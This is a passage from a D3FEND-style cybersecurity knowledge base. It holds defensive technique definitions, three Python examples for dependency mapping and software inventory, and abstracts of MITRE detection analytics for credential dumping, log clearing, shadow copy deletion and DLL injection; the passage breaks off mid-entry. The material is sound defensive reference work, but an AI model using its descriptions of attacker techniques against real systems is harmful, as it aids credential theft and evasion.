kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-006: Windows Remote Management (WinRM) - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-006: Windows Remote Management (WinRM)"

Usage (5)

kb-abstract

  • "Keystroke dynamics or typing dynamics refers to the automated method of identifying or confirming the identity of an individual based on the manner and the rhythm of typing on a keyboard. Keystroke dynamics is a behavioral biometric, this means that the biometric factor is 'something you do'.

    Already during the Second World War a technique known as The Fist of the Sender was used by military intelligence to distinguish, based on the rhythm, whether a Morse code message was sent by ally or enemy. These days each household has at least one computer keyboard, making keystroke dynamics the easiest biometric solution to implement in terms of hardware.

    With keystroke dynamics the biometric template used to identify an individual is based on the typing pattern, the rhythm and the speed of typing on a keyboard. The raw measurements used for keystroke dynamics are dwell time and flight time."

kb-author

  • "Biometric Solutions"

kb-organization

  • "Biometric Solutions"

rdfs:label

  • "Reference - http://www.biometric-solutions.com/keystroke-dynamics.html - biometric-solutions.com"

kb-reference-of

kb-reference-title

  • "Keystroke Dynamics"

Usage (5)


definition

  • "A service dependency indicates a service has an activity, agent, or another service which relies on it in order to be functional."

rdfs:label

  • "Service Dependency"

Usage (5)

definition

  • "Service dependency mapping determines the services on which each given service relies."

kb-article

  • "## How it works
    The organization collects and models architectural information about the services and consumers of services and maps the dependencies between the services.

    ## Considerations
    * Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.
    * Service dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.
    * Service dependencies in cloud or microservice architectures may be discovered using distributed tracing capabilities."
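The distributed-tracing consideration above can be made concrete: each trace span records the service that emitted it and the span that caused it, so a child span in a different service than its parent is a cross-service call, and the set of such parent-to-child pairs is the service dependency map. The following is an added example, not code from D3FEND or any tracing product; the span records and service names are constructed for illustration, and the field names (trace_id, span_id, parent_id, service) are assumptions about the trace format rather than any specific vendor's schema.

```python
"""Derive a service dependency map from distributed-trace spans (added example)."""
from collections import Counter, defaultdict

# Constructed sample spans, not captured from a real system. Each span records
# which service emitted it and which span (if any) caused it. A child span in a
# different service than its parent is a cross-service call.
SAMPLE_SPANS = [
    {"trace_id": "t1", "span_id": "a", "parent_id": None, "service": "web-frontend"},
    {"trace_id": "t1", "span_id": "b", "parent_id": "a", "service": "order-api"},
    {"trace_id": "t1", "span_id": "c", "parent_id": "b", "service": "payments"},
    {"trace_id": "t1", "span_id": "d", "parent_id": "b", "service": "orders-db"},
    {"trace_id": "t1", "span_id": "e", "parent_id": "b", "service": "order-api"},  # same-service span
    {"trace_id": "t2", "span_id": "f", "parent_id": None, "service": "web-frontend"},
    {"trace_id": "t2", "span_id": "g", "parent_id": "f", "service": "order-api"},
    {"trace_id": "t2", "span_id": "h", "parent_id": "g", "service": "payments"},
    {"trace_id": "t2", "span_id": "i", "parent_id": "h", "service": "fraud-check"},
    {"trace_id": "t3", "span_id": "j", "parent_id": None, "service": "batch-reconciler"},
    {"trace_id": "t3", "span_id": "k", "parent_id": "j", "service": "orders-db"},
    {"trace_id": "t3", "span_id": "z", "parent_id": "missing", "service": "payments"},  # orphan span
]


def build_dependency_map(spans):
    """Return {(caller, callee): call_count} for every cross-service parent->child edge.

    Spans whose parent is not present in the same trace (orphans, dropped spans)
    are skipped rather than guessed at: a fabricated edge is worse than a gap.
    """
    by_trace = defaultdict(dict)
    for s in spans:
        by_trace[s["trace_id"]][s["span_id"]] = s
    edges = Counter()
    for trace in by_trace.values():
        for span in trace.values():
            parent = trace.get(span["parent_id"])
            if parent is None:
                continue
            if parent["service"] != span["service"]:
                edges[(parent["service"], span["service"])] += 1
    return dict(edges)


def dependents_of(edges, service):
    """Services that call `service` directly; these are impaired if it fails."""
    return sorted({caller for (caller, callee) in edges if callee == service})


def dependencies_of(edges, service):
    """Services that `service` calls directly; these are what it relies on."""
    return sorted({callee for (caller, callee) in edges if caller == service})


def entry_points(edges):
    """Services never called by another service (externally facing or scheduled)."""
    callers = {c for c, _ in edges}
    callees = {c for _, c in edges}
    return sorted(callers - callees)


if __name__ == "__main__":
    edges = build_dependency_map(SAMPLE_SPANS)
    for (caller, callee), n in sorted(edges.items()):
        print(f"{caller} -> {callee} ({n} calls)")
    print("entry points:", entry_points(edges))
    print("relies on orders-db:", dependents_of(edges, "orders-db"))
```

Because the map is built from observed calls, an edge that appears in traces but not in the architectural design artifacts is exactly the unintended dependency the first consideration asks SMEs to rule on, and a critical service's `dependents_of` set is the starting point for the supply chain prioritization in the second.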

rdfs:label

  • "Service Dependency Mapping"

synonym

  • "Distributed Tracing"

d3fend-id

  • "D3-SVCDM"

kb-reference

maps

Usage (5)

definition

  • "Software inventorying identifies and records the software items in the organization's architecture."

kb-article

  • "## How it works
    Administrators collect information on software items in their architecture using a variety of administrative and management tools that query network nodes for information. In limited cases, where such queries are not supported or do not provide the specific information of interest, an administrator may also collect this information through network enumeration methods to determine the services responding on network nodes.

    ## Considerations
    * Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.
    * An adversary conducting network enumeration may engage in activities that parallel normal software inventorying activities, but would need to escalate to administrative privileges for most of the operations that require administrative tools.

    ## Examples

    Application-layer discovery:

    * Simple Network Management Protocol (SNMP) collects MIB information
    * Web-based Enterprise Management (WBEM) collects CIM information
    * Windows Management Instrumentation (WMI)
    * Windows Management Infrastructure (MI)"
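The first example in the list above, SNMP collecting MIB information, is worth showing end to end, because the HOST-RESOURCES-MIB (RFC 2790) hrSWInstalledTable is one of the few vendor-neutral ways to pull an installed-software list from a node. The following is an added example, not D3FEND code or any product's implementation. The walk output is constructed to look like `snmpwalk -On` output for the hrSWInstalledName (1.3.6.1.2.1.25.6.3.1.2) and hrSWInstalledType (1.3.6.1.2.1.25.6.3.1.4) columns, and the package names and the allowlist are illustrative assumptions.

```python
"""Turn an SNMP walk of HOST-RESOURCES-MIB::hrSWInstalledTable into an inventory (added example)."""
import re

# Column OIDs of hrSWInstalledEntry in HOST-RESOURCES-MIB (RFC 2790).
HR_SW_INSTALLED_NAME = "1.3.6.1.2.1.25.6.3.1.2"
HR_SW_INSTALLED_TYPE = "1.3.6.1.2.1.25.6.3.1.4"
# hrSWInstalledType enumeration from the same MIB.
SW_TYPE = {1: "unknown", 2: "operatingSystem", 3: "deviceDriver", 4: "application"}

# Constructed sample of what a numeric-OID walk of the two columns looks like,
# one varbind per line. Not captured from a real host.
SAMPLE_WALK = """\
.1.3.6.1.2.1.25.6.3.1.2.1 = STRING: "openssh-server-8.7p1"
.1.3.6.1.2.1.25.6.3.1.2.2 = STRING: "kernel-5.14.0"
.1.3.6.1.2.1.25.6.3.1.2.3 = STRING: "nc-1.10"
.1.3.6.1.2.1.25.6.3.1.2.4 = STRING: "bash-5.1.8"
.1.3.6.1.2.1.25.6.3.1.4.1 = INTEGER: 4
.1.3.6.1.2.1.25.6.3.1.4.2 = INTEGER: 2
.1.3.6.1.2.1.25.6.3.1.4.3 = INTEGER: 4
.1.3.6.1.2.1.25.6.3.1.4.4 = INTEGER: 4
"""

# "<oid> = <TYPE>: <value>" as printed by snmpwalk -On
LINE_RE = re.compile(r"^\.?(?P<oid>[\d.]+)\s*=\s*(?P<type>\w+):\s*(?P<value>.*)$")


def parse_hr_sw_installed(walk_text):
    """Return {hrSWInstalledIndex: {"name": str, "type": str}} from walk output."""
    rows = {}
    for line in walk_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # tolerate banners and blank lines in captured output
        oid, value = m.group("oid"), m.group("value")
        column, _, index = oid.rpartition(".")  # last arc is the table row index
        row = rows.setdefault(int(index), {})
        if column == HR_SW_INSTALLED_NAME:
            row["name"] = value.strip('"')
        elif column == HR_SW_INSTALLED_TYPE:
            row["type"] = SW_TYPE.get(int(value), "unknown")
    return rows


def unexpected_software(rows, allowlist):
    """Installed names whose package (version stripped) is not on the allowlist.

    Matching on the name before the trailing version means a routine update
    does not raise a finding, while a newly installed package does.
    """
    def base_name(full):
        return full.rsplit("-", 1)[0] if "-" in full else full

    return sorted(r["name"] for r in rows.values()
                  if r.get("name") and base_name(r["name"]) not in allowlist)


if __name__ == "__main__":
    inventory = parse_hr_sw_installed(SAMPLE_WALK)
    for idx, row in sorted(inventory.items()):
        print(idx, row.get("type"), row.get("name"))
    print("unexpected:", unexpected_software(inventory, {"openssh-server", "kernel", "bash"}))
```

In line with the first consideration, this collection is a read-only poll of an agent the node already runs, so it has none of the side effects of active probing; the walk itself should go over SNMPv3 with authentication, since the inventory reveals exactly which versions an adversary would target.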

rdfs:label

  • "Software Inventory"

synonym

  • "Software Discovery"
  • "Software Inventorying"

d3fend-id

  • "D3-SWI"

inventories

kb-reference

Usage (5)

definition

  • "A system dependency indicates a system has an activity, agent, or another system which relies on it in order to be functional."

rdfs:label

  • "System Dependency"

rdfs:seeAlso

Usage (5)

definition

  • "System dependency mapping identifies and models the dependencies of system components on each other to carry out their function."

kb-article

  • "## How it works
    The organization collects and models architectural information about the software, hardware, and products and maps the dependencies between systems, including each system's internal components and dependencies.

    ## Considerations
    * Data exchanges identified in the network mapping efforts usually indicate such dependencies, but may not be part of the intended design.
    * Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.
    * System dependency mapping can identify internal dependencies of standard and pre-built systems that should be incorporated into a complete system dependency model.
    * System dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.
    * System dependencies should identify the integral components of a given named system and their structure to form a system.
    * The dependencies within a given system may be fixed by a particular product's configuration, so leveraging external knowledge bases of dependency information where they are available (e.g., from package managers) is essential."
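The last consideration, using package manager metadata as a dependency knowledge base, can be illustrated with the question a practitioner actually asks during supply chain risk analysis: given a component with a newly disclosed weakness, which installed packages depend on it, directly or transitively? The following is an added example and not D3FEND code or any package manager's tooling. The stanzas are constructed in a dpkg-status-like layout (Package, Version, Depends with version constraints, architecture qualifiers and `|` alternatives) and the package names are illustrative assumptions.

```python
"""Build a system dependency model from package-manager metadata (added example)."""
import re
from collections import defaultdict

# Constructed dpkg-style status stanzas, not from a real host; only the fields
# this example reads are included.
SAMPLE_STATUS = """\
Package: web-app
Version: 2.1.0
Depends: libssl3 (>= 3.0), libcurl4 (>= 7.8), python3:any | python3-minimal

Package: libcurl4
Version: 7.88.1
Depends: libssl3 (>= 3.0), libnghttp2-14

Package: libssl3
Version: 3.0.11
Depends: libc6

Package: libnghttp2-14
Version: 1.52.0
Depends: libc6

Package: python3
Version: 3.11.2
Depends: libc6

Package: libc6
Version: 2.36

Package: monitoring-agent
Version: 1.4
Depends: libcurl4, systemd-sysv | sysvinit-core
"""

# Leading package name of one alternative: "libssl3 (>= 3.0)" -> libssl3, "python3:any" -> python3
DEP_NAME_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9+.\-]*)")


def parse_depends(field):
    """Expand a Depends: field into a list of alternative groups of package names."""
    groups = []
    for clause in field.split(","):
        names = [m.group(1) for m in map(DEP_NAME_RE.match, clause.split("|")) if m]
        if names:
            groups.append(names)
    return groups


def parse_status(text):
    """Return {package: [[alternative, ...], ...]} from stanza-formatted metadata."""
    deps = {}
    for stanza in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in stanza.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        if "Package" in fields:
            deps[fields["Package"]] = parse_depends(fields.get("Depends", ""))
    return deps


def reverse_dependencies(deps):
    """{package: set of packages that list it directly as a dependency}."""
    rdeps = defaultdict(set)
    for pkg, groups in deps.items():
        for group in groups:
            for name in group:
                rdeps[name].add(pkg)
    return rdeps


def impacted_by(deps, component):
    """All packages that transitively depend on `component` (e.g. a vulnerable library)."""
    rdeps = reverse_dependencies(deps)
    seen, stack = set(), [component]
    while stack:
        for parent in rdeps.get(stack.pop(), ()):
            if parent not in seen:
                seen.add(parent)
                stack.append(parent)
    return sorted(seen)


def unresolved(deps):
    """Dependency groups with no alternative present in the model: gaps in the inventory."""
    return [(pkg, group) for pkg, groups in deps.items() for group in groups
            if not any(alt in deps for alt in group)]


if __name__ == "__main__":
    model = parse_status(SAMPLE_STATUS)
    print("impacted by libssl3:", impacted_by(model, "libssl3"))
    print("unresolved:", unresolved(model))
```

Two points the model surfaces that a flat software inventory does not: `impacted_by` turns a single vulnerable library into the list of systems to prioritize, which is the supply chain triage the fourth consideration calls for, and `unresolved` flags dependencies the metadata declares but the inventory does not contain, which usually means either an incomplete model or a component provided outside the package manager that the mapping must still account for.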

rdfs:label

  • "System Dependency Mapping"

d3fend-id

  • "D3-SYSDM"

kb-reference

maps

Usage (5)

definition

  • "System mapping encompasses the techniques to identify the organization's systems, how they are configured and decomposed into subsystems and components, how they are dependent on one another, and where they are physically located."

rdfs:label

  • "System Mapping"

d3fend-id

  • "D3-SYSM"

display-order

  • 2

enables

Usage (5)

definition

  • "System vulnerability assessment relates all the vulnerabilities of a system's components in the context of their configuration and internal dependencies and can also include assessing risk emerging from the system's design as a whole, not just the sum of individual component vulnerabilities."

rdfs:label

  • "System Vulnerability Assessment"

d3fend-id

  • "D3-SYSVA"

evaluates

identifies

kb-reference

Usage (5)

attack-id

  • "T1007"

rdfs:label

  • "System Service Discovery"

may-invoke

Usage (5)

attack-id

  • "T1010"

rdfs:label

  • "Application Window Discovery"

may-invoke

Usage (5)

attack-id

  • "T1012"

rdfs:label

  • "Query Registry"

accesses

may-invoke

Usage (5)

attack-id

  • "T1016"

rdfs:label

  • "System Network Configuration Discovery"

may-execute

may-invoke

Usage (5)

attack-id

  • "T1018"

rdfs:label

  • "Remote System Discovery"

may-access

may-invoke

produces

Usage (5)

attack-id

  • "T1033"

rdfs:label

  • "System Owner/User Discovery"

may-access

may-invoke

Usage (5)

attack-id

  • "T1047"

rdfs:label

  • "Windows Management Instrumentation Execution"

may-create

may-invoke

Usage (5)

attack-id

  • "T1049"

rdfs:label

  • "System Network Connections Discovery"

may-invoke

Usage (5)

attack-id

  • "T1057"

rdfs:label

  • "Process Discovery"

may-invoke

Usage (5)

attack-id

  • "T1082"

rdfs:label

  • "System Information Discovery"

may-access

may-invoke

Usage (5)

attack-id

  • "T1083"

rdfs:label

  • "File and Directory Discovery"

accesses

Usage (5)

attack-id

  • "T1124"

rdfs:label

  • "System Time Discovery"

may-invoke

Usage (5)

attack-id

  • "T1142"

rdfs:label

  • "Keychain"

accesses

Usage (5)

definition

  • "Analyzing the reputation of a URL."

rdfs:label

  • "URL Reputation Analysis"

analyzes

d3fend-id

  • "D3-URA"

kb-reference

Usage (5)

kb-abstract

  • "Approaches for executing untrusted software on a client without compromising the client using micro-virtualization to execute untrusted software in isolated contexts. A template for instantiating a virtual machine on a client is identified in response to receiving a request to execute an application. After the template is identified, without human intervention, a virtual machine is instantiated, using the template, in which the application is to be executed. The template may be selected from a plurality of templates based on the nature of the request, as each template describes characteristics of a virtual machine suitable for a different type of activity. Selected resources such as files are displayed to the virtual machines according to user and organization policies and controls. When the client determines that the application has ceased to execute, the client ceases execution of the virtual machine without human intervention."

kb-author

  • "Gaurav Banga, Ian Pratt, Kiran Bondalapati, Vikram Kapoor"

kb-mitre-analysis

  • ""

kb-organization

  • "Bromium, Inc."

rdfs:label

  • "Reference - Approaches for securing an internet endpoint using fine-grained operating system virtualization - Bromium, Inc."

kb-reference-of

kb-reference-title

  • "Approaches for securing an internet endpoint using fine-grained operating system virtualization"

Usage (5)

kb-abstract

  • "Microsoft Windows uses its implementation of Distributed Computing Environment/Remote Procedure Call (DCE/RPC), which it calls Microsoft RPC, to call certain APIs remotely.

    A Remote Procedure Call is initiated by communicating to the RPC Endpoint Mapper, which exists as the Windows service RpcEptMapper and listens on the port 135/tcp. The endpoint mapper resolves a requested endpoint/interface and responds to the client with the port that the service is listening on. Since the RPC endpoints are assigned ports when the services start, these ports are dynamically assigned from 49152 to 65535. The connection to the endpoint mapper then terminates and the client program can communicate directly with the requested service.

    RPC is a legitimate functionality of Windows that allows remote interaction with a variety of services. For a Windows environment to be properly configured, several programs use RPC to communicate legitimately with servers. The background and benign RPC activity may be enormous, but must be learned, especially peer-to-peer RPC between workstations, which is often indicative of Lateral Movement."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-05-001: RPC Activity - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-05-001: RPC Activity"

Usage (5)

kb-abstract

  • "When AT.exe is used to remotely schedule tasks, Windows uses named pipes over SMB to communicate with the API on the remote machine. After authentication over SMB, the Named Pipe “ATSVC” is opened, over which the JobAdd function is called. On the remote host, the job files are created by the Task Scheduler and follow the convention C:\Windows\System32\AT<job_id>. Unlike CAR-2013-05-004, this analytic specifically focuses on uses of AT that can be detected between hosts, indicating remotely gained execution.

    This pipe activity could be discovered with a network decoder, such as that in Wireshark, that can inspect SMB traffic to identify the use of pipes. It could also be detected by looking for raw packet capture streams or from a custom sensor on the host that hooks the appropriate API functions. If no network or API level of visibility is possible, this traffic may be inferred by looking at SMB connections over 445/tcp followed by the creation of files matching the pattern C:\Windows\System32\AT<job_id>."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2015-04-001: Remotely Scheduled Tasks via AT - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2015-04-001: Remotely Scheduled Tasks via AT"

Usage (5)

kb-abstract

  • "The Windows Volume Shadow Copy Service is a built-in OS feature that can be used to create backup copies of files and volumes.

    Adversaries may delete these shadow copies, typically through the usage of system utilities such as vssadmin.exe or wmic.exe, in order to prevent file and data recovery. This technique is commonly employed for this purpose by ransomware."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-04-001: Shadow Copy Deletion - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-04-001: Shadow Copy Deletion"

Usage (5)

kb-abstract

  • "This analytic detects the minidump variant of credential dumping where a process opens lsass.exe in order to extract credentials using the Win32 API call MiniDumpWriteDump. Tools like SafetyKatz, SafetyDump, and Outflank-Dumpert default to this variant and may be detected by this analytic, though keep in mind that not all options for using those tools will result in this specific behavior.

    The analytic is based on a Sigma analytic contributed by Samir Bousseaden and written up in a blog on MENASEC. It looks for a call trace that includes either dbghelp.dll or dbgcore.dll, which export the relevant functions/permissions to perform the dump. It also detects using the Windows Task Manager (taskmgr.exe) to dump lsass, which is described in CAR-2019-08-001. In this iteration of the Sigma analytic, the GrantedAccess filter isn’t included because it didn’t seem to filter out any false positives and introduces the potential for evasion.

    This analytic was tested both in a lab and in a production environment with a very low false-positive rate. werfault.exe and tasklist.exe, both standard Windows processes, showed up multiple times as false positives."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-05-001: MiniDump of LSASS - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-05-001: MiniDump of LSASS"

Usage (5)

kb-abstract

  • "LoLBAS are binaries and scripts that are built in to Windows, frequently are signed by Microsoft, and may be used by an attacker. Some LoLBAS are used very rarely and it might be possible to alert every time they’re used (this would depend on your environment), but many others are very common and can’t be simply alerted on.

    This analytic takes all instances of LoLBAS execution and then looks for instances of command lines that are not normal in the environment. This can detect attackers (which will tend to need the binaries for something different than normal usage) but will also tend to have false positives.

    The analytic needs to be tuned. The 1.5 in the query is the number of standard deviations away to look. It can be tuned up to filter out more noise and tuned down to get more results. This means it is probably best as a hunting analytic when you have analysts looking at the screen and able to tune the analytic up and down, because the threshold may not be stable for very long."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-05-003: Rare LolBAS Command Lines - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-05-003: Rare LolBAS Command Lines"

Usage (5)

kb-abstract

  • "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. ADSs are also powerful because they can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using system utilities such as powershell."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities"

Usage (5)

kb-abstract

  • "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\Windows\Tasks (legacy) or C:\Windows\System32\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-001: Scheduled Task - FileAccess - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-001: Scheduled Task - FileAccess"

Usage (5)

kb-abstract

  • "Adversaries may establish persistence or escalate privileges by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. This is typically done by replacing COM object registry entries under the HKEY_CURRENT_USER\Software\Classes\CLSID or HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID keys. Accordingly, this analytic looks for any changes under these keys."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-002: Component Object Model Hijacking - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-002: Component Object Model Hijacking"

Usage (5)

kb-abstract

  • "Adversaries may attempt to evade system defenses by unloading minifilter drivers used by host-based sensors such as Sysmon through the use of the fltmc command-line utility. Accordingly, this analytic looks for command-line invocations of this utility when used to unload minifilter drivers."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-003: Indicator Blocking - Driver Unloaded - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-003: Indicator Blocking - Driver Unloaded"

Usage (5)

kb-abstract

  • "Adversaries may search the Windows Registry on compromised systems for insecurely stored credentials for credential access. This can be accomplished using the query functionality of the reg.exe system utility, by looking for keys and values that contain strings such as “password”. In addition, adversaries may use toolkits such as PowerSploit in order to dump credentials from various applications such as IIS. Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several PowerSploit modules with similar functionality."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-004: Credentials in Files & Registry - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-004: Credentials in Files & Registry"

Usage (5)

kb-abstract

  • "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. These values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes. Accordingly, this analytic looks for modifications to these registry keys that may be indicative of this type of abuse."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-005: AppInit DLLs - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-005: AppInit DLLs"

Usage (5)

kb-abstract

  • "Adversaries may schedule software to run whenever a user logs into the system; this is done to establish persistence and sometimes for lateral movement. This trigger is established through the registry key HKEY_CURRENT_USER\Environment\UserInitMprLogonScript. This signature looks for edits to existing keys or creation of new keys in that path. Users purposefully adding benign scripts to this path will result in false positives; that case is rare, however. There are other ways of running a script at startup or login that are not covered in this signature. Note that this signature overlaps with the Windows Sysinternals Autoruns tool, which would also show changes to this registry path."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-001: Boot or Logon Initialization Scripts - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-001: Boot or Logon Initialization Scripts"

Usage (5)

kb-abstract

  • "Adversaries may use a variety of tools to gain visibility on the current status of things on the network: which processes are listening on which ports, which services are running on other hosts, etc. This analytic looks for the names of the most common network sniffing tools. While this may be noisy on networks where sysadmins are using any of these tools on a regular basis, in most networks their use is noteworthy."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-002: Local Network Sniffing - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-002: Local Network Sniffing"

Usage (5)

kb-abstract

  • "Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it rolls up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument “INJECTRUNNING” as a related signature here. Whitelisting certain applications may be necessary to reduce noise for this analytic."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-003: DLL Injection with Mavinject - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-003: DLL Injection with Mavinject"

Usage (5)

kb-abstract

  • "Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past; when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discrepancy. These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before Sysmon processes the event."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-004: Processes Started From Irregular Parent - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-004: Processes Started From Irregular Parent"

Usage (5)

kb-abstract

  • "Adversaries may attempt to conceal their tracks by deleting the history of commands run within the PowerShell console, or turning off history saving to begin with. This analytic looks for several commands that would do this. This does not capture the event if it is done within the console itself; only command-line-based commands are detected. Note that the command to remove the history file directly may vary a bit if the history file is not saved in the default path on a particular system."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-005: Clear Powershell Console Command History - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-005: Clear Powershell Console Command History"

Usage (5)

kb-abstract

  • "Cyber actors frequently enumerate local or domain permissions groups. The net utility is usually used for this purpose. This analytic looks for any instances of net.exe, which is not normally used for benign purposes, although system administrator actions may trigger false positives."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-006: Local Permission Group Discovery - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-006: Local Permission Group Discovery"

Usage (5)

kb-abstract

  • "Adversaries may use network shares to exfiltrate data; they will then remove the shares to cover their tracks. This analytic looks for the removal of network shares via command line, which is otherwise a rare event."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-007: Network Share Connection Removal - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-007: Network Share Connection Removal"

Usage (5)

kb-abstract

  • "Trusted developer utilities such as MSBuild may be leveraged to run malicious code with elevated privileges. This analytic looks for any instances of msbuild.exe, which will execute any C# code placed within a given XML document; and msxsl.exe, which processes XSL transformation specifications for XML files and will execute a variety of scripting languages contained within the XSL file. Both of these executables are rarely used outside of Visual Studio."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-008: MSBuild and msxsl - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-008: MSBuild and msxsl"

Usage (5)

kb-abstract

  • "Adversaries may hide malicious code in .chm compiled HTML files. When these files are read, Windows uses the HTML help executable named hh.exe, which is the signature for this analytic."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-009: Compiled HTML Access - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-009: Compiled HTML Access"

Usage (5)

kb-abstract

  • "CMSTP.exe is the Microsoft Connection Manager Profile Installer, which can be leveraged to set up listeners that will receive and install malware from remote sources in a trusted fashion. When CMSTP.exe is seen in combination with an external connection, it is a good indication of this TTP."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-010: CMSTP - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-010: CMSTP"

Usage (5)

kb-abstract

  • "Often, after a threat actor gains access to a system, they will attempt to run some kind of malware to further infect the victim machine. These malware often have long command line strings, which could be a possible indicator of attack. Here, we use sysmon and Splunk to first find the average command string length and search for command strings that stretch over multiple lines, thus identifying anomalies and possibly malicious commands."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-002: Unusually Long Command Line Strings - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-002: Unusually Long Command Line Strings"

Usage (5)

kb-abstract

  • "In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using “wevtutil”, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network."

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-003: Clearing Windows Logs with Wevtutil - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-003: Clearing Windows Logs with Wevtutil"

Usage (5)

kb-abstract

  • "After gaining initial access to a system, threat actors attempt to escalate privileges as they may be operating within a lower privileged process which does not allow them to access protected information or carry out tasks which require higher permissions. A common way of escalating privileges in a system is by externally invoking and exploiting spoolsv or connhost executables, both of which are legitimate Windows applications. This query searches for an invocation of either of these executables by a user, thus alerting us of any potentially malicious activity."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe - MITRE"

kb-reference-of

kb-reference-title

